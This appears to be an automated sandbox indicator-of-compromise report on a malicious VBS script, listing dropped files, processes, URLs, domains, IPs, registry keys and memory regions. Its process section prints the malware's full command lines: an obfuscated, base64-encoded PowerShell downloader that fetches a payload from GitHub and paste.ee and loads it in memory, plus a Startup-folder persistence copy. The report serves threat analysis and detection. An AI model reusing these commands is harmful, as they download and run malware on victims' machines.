IOC Report
k4STQvJ6rV.vbs

loading gif

Files

File Path
Type
Category
Malicious
k4STQvJ6rV.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_a7bced54e166153f9488577310c1ceac61948ee5_5655fe73_14928db5-979f-4650-8ae6-2ed8a5965fa2\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0BF.tmp.dmp
Mini DuMP crash report, 15 streams, Mon Oct 7 06:57:54 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB39E.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3CE.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XClient.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12llzcar.ppw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h25mcxn.vnu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awi0fsbb.wse.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvjiobm0.d4t.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvlfewif.0lx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdkdakqv.krn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\XClient.exe
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 7 05:56:27 2024, mtime=Mon Oct 7 05:56:27 2024, atime=Mon Oct 7 05:56:27 2024, length=262432, window=hide
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\k4STQvJ6rV.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Windows\system32\k4STQvJ6rV.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.amoimoil.vbs')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdtWHR1cicrJ2wgJysnPSBkMG1odHRwcycrJzonKycvL3Jhdy5naScrJ3RoJysndWJ1c2UnKydyY29uJysndGVuJysndC5jb20nKycvJysnTm9EZXQnKydlY3RPbi9OJysnbycrJ0RlJysndGUnKydjdCcrJ09uLycrJ3JlZicrJ3MvaGVhZHMvbWEnKydpbi9EZXRhJysnaE5vdGgtJysnVi50eHRkMCcrJ207IG1YdGInKydhc2UnKyc2NENvbnRlbnQgPSAoJysnTmV3LU9iamVjdCBTeScrJ3N0ZW0uTicrJ2V0JysnLldlJysnYkNsaWVudCkuJysnRCcrJ293bmwnKydvYWRTdHJpJysnbicrJ2cobVgnKyd0dXInKydsKTsnKycgbVh0YicrJ2luYScrJ3J5QycrJ29udGVuJysndCA9IFtTJysneXN0JysnZW0uQ29uJysndmUnKydydF06OicrJ0YnKydybycrJ20nKydCJysnYXNlNjRTJysndHJpbicrJ2cobVh0YmEnKydzJysnZTYnKyc0Q29uJysndGUnKydudCcrJyk7IG1YdGFzJysnc2UnKydtYicrJ2wnKyd5ID0nKycgW1JlZicrJ2wnKydlY3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzonKydMb2FkJysnKCcrJ21YdGJpbmFyeUNvJysnbnRlbnQpOyBbZG5saWInKycuSScrJ08uJysnSG9tZV06JysnOlZBSSgnKyc3cEswJysnLzQzVnluL2QvZWUuZXRzJysnYScrJ3AvLzpzcHR0aCcrJzdwSycrJywnKycgN3BLZGVzJysnYXQnKydpdmEnKydkbycrJzdwSycrJywnKycgJysnN3AnKydLZGVzYXRpdmFkbycrJzcnKydwSywgN3BLZGVzYXQnKydpdicrJ2FkbzdwSywgJysnN3BLJysnTVNCJysndScrJ2lsZDcnKydwSycrJywgNycrJ3BLN3BLLDdwJysnSzdwSyknKS5SRXBMYWNlKChbY2hhcl0xMDArW2NoYXJdNDgrW2NoYXJdMTA5KSxbc3RyaW5nXVtjaGFyXTM5KS5SRXBMYWNlKCdtWHQnLCckJykuUkVwTGFjZSgoW2NoYXJdNTUrW2NoYXJdMTEyK1tjaGFyXTc1KSxbc3RyaW5nXVtjaGFyXTM0KXwgJiAoICRFTnY6Q09tc3BlY1s0LDE1LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('mXtur'+'l '+'= d0mhttps'+':'+'//raw.gi'+'th'+'ubuse'+'rcon'+'ten'+'t.com'+'/'+'NoDet'+'ectOn/N'+'o'+'De'+'te'+'ct'+'On/'+'ref'+'s/heads/ma'+'in/Deta'+'hNoth-'+'V.txtd0'+'m; mXtb'+'ase'+'64Content = ('+'New-Object Sy'+'stem.N'+'et'+'.We'+'bClient).'+'D'+'ownl'+'oadStri'+'n'+'g(mX'+'tur'+'l);'+' mXtb'+'ina'+'ryC'+'onten'+'t = [S'+'yst'+'em.Con'+'ve'+'rt]::'+'F'+'ro'+'m'+'B'+'ase64S'+'trin'+'g(mXtba'+'s'+'e6'+'4Con'+'te'+'nt'+'); mXtas'+'se'+'mb'+'l'+'y ='+' [Ref'+'l'+'ection.'+'A'+'ssembly]:'+':'+'Load'+'('+'mXtbinaryCo'+'ntent); [dnlib'+'.I'+'O.'+'Home]:'+':VAI('+'7pK0'+'/43Vyn/d/ee.ets'+'a'+'p//:sptth'+'7pK'+','+' 7pKdes'+'at'+'iva'+'do'+'7pK'+','+' '+'7p'+'Kdesativado'+'7'+'pK, 7pKdesat'+'iv'+'ado7pK, '+'7pK'+'MSB'+'u'+'ild7'+'pK'+', 7'+'pK7pK,7p'+'K7pK)').REpLace(([char]100+[char]48+[char]109),[string][char]39).REpLace('mXt','$').REpLace(([char]55+[char]112+[char]75),[string][char]34)| & ( $ENv:COmspec[4,15,25]-JoiN'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
malicious
C:\Users\user\AppData\Local\XClient.exe
"C:\Users\user\AppData\Local\XClient.exe"
malicious
C:\Users\user\AppData\Local\XClient.exe
"C:\Users\user\AppData\Local\XClient.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1916
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://paste.ee/d/nyV34/0
188.114.97.3
malicious
futurist2.ddns.net
malicious
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.108.133
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://raw.githubusercont
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
https://raw.githubusercontent.com
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtd0m;
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://raw.githubusercontent.com
unknown
https://oneget.orgX
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
There are 22 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
futurist2.ddns.net
93.123.39.76
malicious
paste.ee
188.114.97.3
malicious
raw.githubusercontent.com
185.199.108.133
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
188.114.97.3
paste.ee
European Union
malicious
127.0.0.1
unknown
unknown
malicious
93.123.39.76
futurist2.ddns.net
Bulgaria
malicious
185.199.108.133
raw.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XClient
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
malicious
1FFE6961000
trusted library allocation
page read and write
malicious
5B02000
trusted library allocation
page read and write
7FFB4AFB0000
trusted library allocation
page read and write
1FFE5F90000
trusted library allocation
page read and write
D93000
heap
page read and write
61E67B7000
stack
page read and write
1AB7BA20000
heap
page read and write
1FFE60D4000
heap
page read and write
1AB7BA65000
heap
page read and write
2C73000
trusted library allocation
page read and write
53E0000
trusted library allocation
page read and write
1AB7BB12000
heap
page read and write
1AB7BB12000
heap
page read and write
6D8C000
stack
page read and write
3F9A000
trusted library allocation
page read and write
1AB7BCC8000
heap
page read and write
7FFB49EA2000
trusted library allocation
page read and write
CA0000
heap
page read and write
24BFB610000
trusted library allocation
page read and write
24B805B2000
trusted library allocation
page read and write
24BFD1D0000
heap
page execute and read and write
1139000
heap
page read and write
7FFB4B000000
trusted library allocation
page read and write
1AB7B99A000
heap
page read and write
1AB79B3B000
heap
page read and write
24BFD1B0000
heap
page read and write
1FFFE6C0000
heap
page execute and read and write
24132CB5000
heap
page read and write
1AB7BA21000
heap
page read and write
2414CC00000
heap
page read and write
7BB0CFB000
stack
page read and write
EE5000
heap
page read and write
13D0000
trusted library allocation
page read and write
24BFD650000
heap
page execute and read and write
1330000
heap
page execute and read and write
1108000
heap
page read and write
5AF4000
trusted library allocation
page read and write
1AB7B997000
heap
page read and write
7FFB4A0F0000
trusted library allocation
page read and write
7BB08FF000
stack
page read and write
2414CC72000
heap
page read and write
3CB1000
trusted library allocation
page read and write
1AB7B923000
heap
page read and write
112B000
heap
page read and write
1109000
heap
page read and write
57531F9000
stack
page read and write
24BFB677000
heap
page read and write
7FFB49EFC000
trusted library allocation
page execute and read and write
24134BDF000
trusted library allocation
page read and write
1FFE45F0000
heap
page read and write
1FFE6809000
trusted library allocation
page read and write
1FFFE5B0000
heap
page execute and read and write
7FFB49F56000
trusted library allocation
page read and write
2414CC1D000
heap
page read and write
1AB7BCB1000
heap
page read and write
61E6A3E000
stack
page read and write
1FFFE68C000
heap
page read and write
7FFB4A170000
trusted library allocation
page read and write
1AB7BA58000
heap
page read and write
24BFB630000
trusted library allocation
page read and write
1057000
trusted library allocation
page execute and read and write
5AF6000
trusted library allocation
page read and write
CA5000
heap
page read and write
1AB7B952000
heap
page read and write
1FFFE42D000
heap
page read and write
24134FE6000
trusted library allocation
page read and write
1240000
heap
page read and write
1AB7BA95000
heap
page read and write
7BB0C76000
stack
page read and write
2414CE9B000
heap
page read and write
575307E000
stack
page read and write
1AB79CA5000
heap
page read and write
7FFB4ADA0000
trusted library allocation
page execute and read and write
7FFB4B083000
trusted library allocation
page read and write
24BFB682000
heap
page read and write
1FFE6040000
heap
page read and write
7FFB4ACED000
trusted library allocation
page execute and read and write
FCD8FD000
stack
page read and write
7FFB49F86000
trusted library allocation
page execute and read and write
105B000
trusted library allocation
page execute and read and write
1AB7B962000
heap
page read and write
10B0000
heap
page read and write
2D20000
heap
page execute and read and write
53E9000
trusted library allocation
page read and write
24132C8E000
heap
page read and write
575347E000
stack
page read and write
5AE9000
stack
page read and write
2DD0000
trusted library allocation
page read and write
7BB0F7C000
stack
page read and write
1AB7B952000
heap
page read and write
13B0000
trusted library allocation
page read and write
7FFB4ADC6000
trusted library allocation
page execute and read and write
7FFB4A150000
trusted library allocation
page read and write
1AB7BCB1000
heap
page read and write
1AB7B932000
heap
page read and write
57533FE000
stack
page read and write
24B804A4000
trusted library allocation
page read and write
1FFFEBF0000
trusted library section
page read and write
7BB0BF9000
stack
page read and write
61E69BE000
stack
page read and write
54C3000
heap
page read and write
24B8009C000
trusted library allocation
page read and write
24B80122000
trusted library allocation
page read and write
12E0000
trusted library allocation
page read and write
1FFFE5C0000
heap
page read and write
13F0000
trusted library allocation
page read and write
7FFB4A190000
trusted library allocation
page read and write
D78000
heap
page read and write
CF0000
heap
page read and write
7FFB4AF20000
trusted library allocation
page read and write
7FFB4AEF0000
trusted library allocation
page read and write
61E667E000
stack
page read and write
55D0000
trusted library allocation
page read and write
24BFD657000
heap
page execute and read and write
61E647E000
stack
page read and write
7FFB4AF10000
trusted library allocation
page read and write
24B80114000
trusted library allocation
page read and write
2B30000
heap
page read and write
61E61CE000
stack
page read and write
123E000
stack
page read and write
1FFE684E000
trusted library allocation
page read and write
7FFB4AF30000
trusted library allocation
page read and write
416000
remote allocation
page execute and read and write
1AB79A30000
heap
page read and write
1AB79A20000
heap
page read and write
13B6000
trusted library allocation
page read and write
2CDE000
stack
page read and write
1AB7B982000
heap
page read and write
7BB097E000
stack
page read and write
143E000
stack
page read and write
1FFE7DF3000
trusted library allocation
page read and write
24BFD205000
heap
page read and write
7BB087D000
stack
page read and write
24134620000
heap
page read and write
1FFE469D000
heap
page read and write
1FFE60D0000
heap
page read and write
EC0000
heap
page read and write
2414CD00000
heap
page execute and read and write
1FFFE667000
heap
page read and write
1AB7BA97000
heap
page read and write
1FFFE713000
heap
page read and write
24134BF4000
trusted library allocation
page read and write
1115000
heap
page read and write
7FFB4A054000
trusted library allocation
page read and write
61E6838000
stack
page read and write
7FFB4B020000
trusted library allocation
page read and write
2EF1000
trusted library allocation
page read and write
1AB7BA88000
heap
page read and write
7FFB4A1E0000
trusted library allocation
page read and write
1AB79B54000
heap
page read and write
1AB7B92C000
heap
page read and write
7FFB4AE91000
trusted library allocation
page read and write
1AB7B947000
heap
page read and write
109D000
trusted library allocation
page execute and read and write
575357C000
stack
page read and write
8EC000
stack
page read and write
5B1D000
trusted library allocation
page read and write
1AB7BD20000
heap
page read and write
6D4D000
stack
page read and write
5752B83000
stack
page read and write
24BFB570000
heap
page read and write
7FFB4AE91000
trusted library allocation
page read and write
1FFFE881000
heap
page read and write
5B22000
trusted library allocation
page read and write
7FFB4AFE0000
trusted library allocation
page read and write
24BFD618000
heap
page read and write
1AB79B51000
heap
page read and write
7FFB4A1D0000
trusted library allocation
page read and write
2414CD76000
heap
page execute and read and write
1AB7BD01000
heap
page read and write
1AB7BD01000
heap
page read and write
1FFFE710000
heap
page read and write
24BFD690000
heap
page read and write
7FFB4B040000
trusted library allocation
page read and write
2DB0000
heap
page execute and read and write
2414CD80000
heap
page read and write
24134C90000
trusted library allocation
page read and write
2ADE000
stack
page read and write
1AB7BC06000
heap
page read and write
7FFB4AE9A000
trusted library allocation
page read and write
7FFB4B090000
trusted library allocation
page read and write
7BB0DFE000
stack
page read and write
24BFD595000
heap
page read and write
1AB7BCC0000
heap
page read and write
2414CC15000
heap
page read and write
7BB05CE000
stack
page read and write
24BFB885000
heap
page read and write
1AB7BD01000
heap
page read and write
FCD3FE000
stack
page read and write
7FFB4A082000
trusted library allocation
page read and write
57534FE000
stack
page read and write
7FFB4AD9C000
trusted library allocation
page execute and read and write
1FFE6643000
trusted library allocation
page read and write
24B8054C000
trusted library allocation
page read and write
7FFB4A1B0000
trusted library allocation
page read and write
5752BCE000
stack
page read and write
24B90001000
trusted library allocation
page read and write
609E000
stack
page read and write
1390000
trusted library allocation
page read and write
7FFB4AF00000
trusted library allocation
page read and write
7FFB4A05A000
trusted library allocation
page read and write
13A0000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
1AB7B972000
heap
page read and write
1FFE60D6000
heap
page read and write
7FFB4AF50000
trusted library allocation
page read and write
7FFB4B000000
trusted library allocation
page read and write
13C6000
trusted library allocation
page execute and read and write
24132BE0000
heap
page read and write
5DFC000
stack
page read and write
1100000
heap
page read and write
7FFB4AE80000
trusted library allocation
page read and write
1FFE5F80000
heap
page execute and read and write
C50000
heap
page read and write
24132B70000
heap
page read and write
10A0000
trusted library allocation
page read and write
24144B62000
trusted library allocation
page read and write
2B08000
trusted library allocation
page read and write
575317E000
stack
page read and write
1FFF6A3B000
trusted library allocation
page read and write
7BB0EFE000
stack
page read and write
2414CD70000
heap
page execute and read and write
1FFF6492000
trusted library allocation
page read and write
1FFF671B000
trusted library allocation
page read and write
24132C25000
heap
page read and write
1080000
trusted library allocation
page read and write
24134BFA000
trusted library allocation
page read and write
6B20000
heap
page read and write
1AB7BCC9000
heap
page read and write
2CA0000
heap
page read and write
1010000
heap
page read and write
1FFE7B63000
trusted library allocation
page read and write
24BFB6F9000
heap
page read and write
1AB7B941000
heap
page read and write
3EF1000
trusted library allocation
page read and write
24132CB7000
heap
page read and write
7FFB4AF90000
trusted library allocation
page read and write
7FFB4A0A0000
trusted library allocation
page read and write
55E0000
heap
page execute and read and write
FCD4FF000
stack
page read and write
1FFFE7F0000
heap
page read and write
CEE000
stack
page read and write
103F000
stack
page read and write
10A0000
trusted library allocation
page read and write
7FFB4A0B0000
trusted library allocation
page read and write
24B8010E000
trusted library allocation
page read and write
1FFE46AB000
heap
page read and write
7FFB4AD90000
trusted library allocation
page read and write
7BB0D78000
stack
page read and write
13BD000
trusted library allocation
page execute and read and write
1AB7BDD9000
heap
page read and write
53DE000
stack
page read and write
D30000
trusted library allocation
page read and write
24B8015E000
trusted library allocation
page read and write
61E65FF000
stack
page read and write
1AB7BC20000
heap
page read and write
7FFB4ACF0000
trusted library allocation
page read and write
1AB7B96B000
heap
page read and write
61E66F9000
stack
page read and write
1AB79B61000
heap
page read and write
24B90072000
trusted library allocation
page read and write
1AB79CA0000
heap
page read and write
2D31000
trusted library allocation
page read and write
24134AF1000
trusted library allocation
page read and write
7FFB4AE00000
trusted library allocation
page execute and read and write
7FFB4AEB0000
trusted library allocation
page execute and read and write
24135022000
trusted library allocation
page read and write
576E000
stack
page read and write
1AB7BA7D000
heap
page read and write
24BFD710000
heap
page execute and read and write
7FFB4B07C000
trusted library allocation
page read and write
7FFB4ACED000
trusted library allocation
page execute and read and write
1AB7BA68000
heap
page read and write
24BFB640000
heap
page readonly
7FFB4A110000
trusted library allocation
page read and write
C3C000
stack
page read and write
24BFD720000
heap
page read and write
1AB7BA29000
heap
page read and write
1FFFE85C000
heap
page read and write
1FFE5FC2000
trusted library allocation
page read and write
575337C000
stack
page read and write
2414D1D0000
heap
page read and write
1AB7B92B000
heap
page read and write
5752FFD000
stack
page read and write
D38000
stack
page read and write
7BB0AFE000
stack
page read and write
68CE000
stack
page read and write
1AB7BC06000
heap
page read and write
1AB7B921000
heap
page read and write
605B000
stack
page read and write
1AB7BC9A000
heap
page read and write
7FFB4AE00000
trusted library allocation
page execute and read and write
1AB7BCC3000
heap
page read and write
2C6E000
stack
page read and write
61E693E000
stack
page read and write
24BFB5D0000
heap
page read and write
24144B00000
trusted library allocation
page read and write
4F2C000
stack
page read and write
24BFD200000
heap
page read and write
1AB79B63000
heap
page read and write
D44000
trusted library allocation
page read and write
24B8010B000
trusted library allocation
page read and write
7FFB4AFA0000
trusted library allocation
page read and write
10C0000
trusted library allocation
page read and write
7FFB4AFD0000
trusted library allocation
page read and write
6FCE000
stack
page read and write
1FFE4630000
heap
page read and write
1AB7B937000
heap
page read and write
1FFE46E4000
heap
page read and write
1AB7BCFD000
heap
page read and write
61E673E000
stack
page read and write
400000
remote allocation
page execute and read and write
7BB0A7E000
stack
page read and write
7BB0E7E000
stack
page read and write
7FFB4AF90000
trusted library allocation
page read and write
10E0000
heap
page read and write
2F58000
trusted library allocation
page read and write
241346C0000
heap
page read and write
2B13000
trusted library allocation
page read and write
7FFB4AF50000
trusted library allocation
page read and write
690D000
stack
page read and write
1FFE4914000
heap
page read and write
FCDBFF000
stack
page read and write
1AB7B99A000
heap
page read and write
1FFE7B3A000
trusted library allocation
page read and write
5AFB000
trusted library allocation
page read and write
FE0000
heap
page read and write
7FFB4A160000
trusted library allocation
page read and write
5E30000
trusted library allocation
page read and write
5B11000
trusted library allocation
page read and write
D70000
heap
page read and write
1050000
trusted library allocation
page read and write
1AB79A80000
heap
page read and write
FE5000
heap
page read and write
1FFFE65E000
heap
page read and write
1094000
trusted library allocation
page read and write
1AB7B950000
heap
page read and write
2414CCA0000
heap
page read and write
7FFB4AFC0000
trusted library allocation
page read and write
1FFFE5FE000
heap
page read and write
1AB7B967000
heap
page read and write
1FFFE832000
heap
page read and write
24BFB880000
heap
page read and write
24134C04000
trusted library allocation
page read and write
7FFB4AFC0000
trusted library allocation
page read and write
7FFB4A040000
trusted library allocation
page read and write
1AB79B55000
heap
page read and write
7FFB4ACE4000
trusted library allocation
page read and write
24B90010000
trusted library allocation
page read and write
7FFB4A090000
trusted library allocation
page execute and read and write
1AB7B922000
heap
page read and write
61E60C3000
stack
page read and write
1148000
heap
page read and write
D8E000
heap
page read and write
7BB0B7E000
stack
page read and write
1AB7BA90000
heap
page read and write
5B30000
heap
page read and write
5753F4E000
stack
page read and write
1280000
heap
page read and write
1AB7B99A000
heap
page read and write
1080000
trusted library allocation
page execute and read and write
7FFB4AFB0000
trusted library allocation
page read and write
13C0000
trusted library allocation
page read and write
7FFB4AF70000
trusted library allocation
page read and write
7FFB49EC0000
trusted library allocation
page read and write
10CB000
trusted library allocation
page execute and read and write
24B80111000
trusted library allocation
page read and write
1FFE4900000
trusted library allocation
page read and write
24132C38000
heap
page read and write
7FFB4B030000
trusted library allocation
page read and write
24BFB490000
heap
page read and write
5C30000
trusted library allocation
page read and write
13D2000
trusted library allocation
page read and write
7FFB4AE9A000
trusted library allocation
page read and write
10BA000
trusted library allocation
page execute and read and write
24BFD5F3000
heap
page read and write
FCD7FE000
stack
page read and write
24132C30000
heap
page read and write
1390000
trusted library allocation
page read and write
820000
unkown
page readonly
1AB7B972000
heap
page read and write
2DA0000
trusted library allocation
page read and write
5CA1000
trusted library allocation
page read and write
1FFE5F60000
trusted library allocation
page read and write
FEF000
stack
page read and write
1AB7BA2C000
heap
page read and write
24B80069000
trusted library allocation
page read and write
7FFB4AEE0000
trusted library allocation
page read and write
1AB7B920000
heap
page read and write
1FFFE85F000
heap
page read and write
1AB7B950000
heap
page read and write
7FFB4AFF0000
trusted library allocation
page read and write
241345E0000
trusted library allocation
page read and write
24134B4D000
trusted library allocation
page read and write
1FFE684A000
trusted library allocation
page read and write
61E683E000
stack
page read and write
1AB7B925000
heap
page read and write
7FFB4AF30000
trusted library allocation
page read and write
1AB7BA68000
heap
page read and write
6E8D000
stack
page read and write
7FFB4AFA0000
trusted library allocation
page read and write
1FFE6822000
trusted library allocation
page read and write
1AB7BA78000
heap
page read and write
61E657E000
stack
page read and write
59EA000
stack
page read and write
1093000
trusted library allocation
page execute and read and write
2B00000
trusted library allocation
page read and write
1040000
trusted library allocation
page read and write
7FFB4ACE3000
trusted library allocation
page execute and read and write
1AB7BD21000
heap
page read and write
1FFE7D96000
trusted library allocation
page read and write
51E0000
heap
page execute and read and write
1AB7BCC1000
heap
page read and write
1446000
heap
page read and write
57530FE000
stack
page read and write
1FFFE879000
heap
page read and write
2EEF000
stack
page read and write
1AB79AC2000
heap
page read and write
1AB7B950000
heap
page read and write
1FFE7B3E000
trusted library allocation
page read and write
57532F8000
stack
page read and write
10C7000
trusted library allocation
page execute and read and write
6B10000
heap
page read and write
7FFB4A140000
trusted library allocation
page read and write
7FFB4AD96000
trusted library allocation
page read and write
1FFE4660000
heap
page read and write
24BFB650000
trusted library allocation
page read and write
D43000
trusted library allocation
page execute and read and write
1AB7B98F000
heap
page read and write
5C50000
trusted library allocation
page read and write
7FFB4AED0000
trusted library allocation
page execute and read and write
1AB7B99A000
heap
page read and write
1AB7BCBB000
heap
page read and write
24134C09000
trusted library allocation
page read and write
1FFE7DB6000
trusted library allocation
page read and write
7FFB4AF60000
trusted library allocation
page read and write
FEE40000
trusted library allocation
page execute and read and write
5AF0000
trusted library allocation
page read and write
24134B13000
trusted library allocation
page read and write
7FFB4AE82000
trusted library allocation
page read and write
5B16000
trusted library allocation
page read and write
2414CC8E000
heap
page read and write
1FFE7B2D000
trusted library allocation
page read and write
6C4C000
stack
page read and write
24134B3A000
trusted library allocation
page read and write
1AB7B992000
heap
page read and write
1FFE467E000
heap
page read and write
1AB7B924000
heap
page read and write
1AB7B950000
heap
page read and write
24134BED000
trusted library allocation
page read and write
5C80000
trusted library allocation
page execute and read and write
104A000
trusted library allocation
page execute and read and write
5752E7F000
stack
page read and write
7FFB4ADC6000
trusted library allocation
page execute and read and write
1FFFE65B000
heap
page read and write
24144AF1000
trusted library allocation
page read and write
7FFB4ACE3000
trusted library allocation
page execute and read and write
7FFB4A060000
trusted library allocation
page execute and read and write
7FFB4AF10000
trusted library allocation
page read and write
24134BE5000
trusted library allocation
page read and write
E5B000
stack
page read and write
61E6B3B000
stack
page read and write
132E000
stack
page read and write
24132BA0000
heap
page read and write
7FFB4AF80000
trusted library allocation
page read and write
1440000
heap
page read and write
13A0000
trusted library allocation
page read and write
2414CDA0000
heap
page read and write
1FFE5F40000
trusted library allocation
page read and write
7FFB4AEA0000
trusted library allocation
page execute and read and write
7DF492620000
trusted library allocation
page execute and read and write
7FFB4ACE2000
trusted library allocation
page read and write
1AB7B957000
heap
page read and write
DE3000
heap
page read and write
2D90000
trusted library allocation
page execute and read and write
12DF000
stack
page read and write
2F30000
trusted library allocation
page read and write
1AB7B4E0000
heap
page read and write
7FFB4A1F0000
trusted library allocation
page read and write
1FFE46A1000
heap
page read and write
6ECC000
stack
page read and write
24B8054E000
trusted library allocation
page read and write
1FFF6430000
trusted library allocation
page read and write
7FFB4AF60000
trusted library allocation
page read and write
7FFB4A1C0000
trusted library allocation
page read and write
24132C78000
heap
page read and write
1FFE4910000
heap
page read and write
1FFE7EE2000
trusted library allocation
page read and write
7FFB4B010000
trusted library allocation
page read and write
3D31000
trusted library allocation
page read and write
13C2000
trusted library allocation
page read and write
24BFB6F7000
heap
page read and write
1136000
heap
page read and write
1FFE6421000
trusted library allocation
page read and write
FCD6FE000
stack
page read and write
55CE000
